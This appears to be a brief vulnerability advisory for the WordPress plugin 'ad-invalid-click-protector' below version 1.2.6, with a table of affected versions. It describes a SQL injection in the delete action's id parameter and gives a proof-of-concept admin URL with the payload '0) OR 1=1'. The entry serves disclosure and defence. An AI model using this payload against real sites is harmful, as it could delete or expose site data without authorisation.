The plugin is affected by a SQL Injection in the id parameter of the delete action.
http://127.0.0.1:8001/wp-admin/admin.php?page=aicp_banned_user_details&action;=delete&id;=0)%20OR%201=1%20–%20k
CPE | Name | Operator | Version |
---|---|---|---|
ad-invalid-click-protector | lt | 1.2.6 |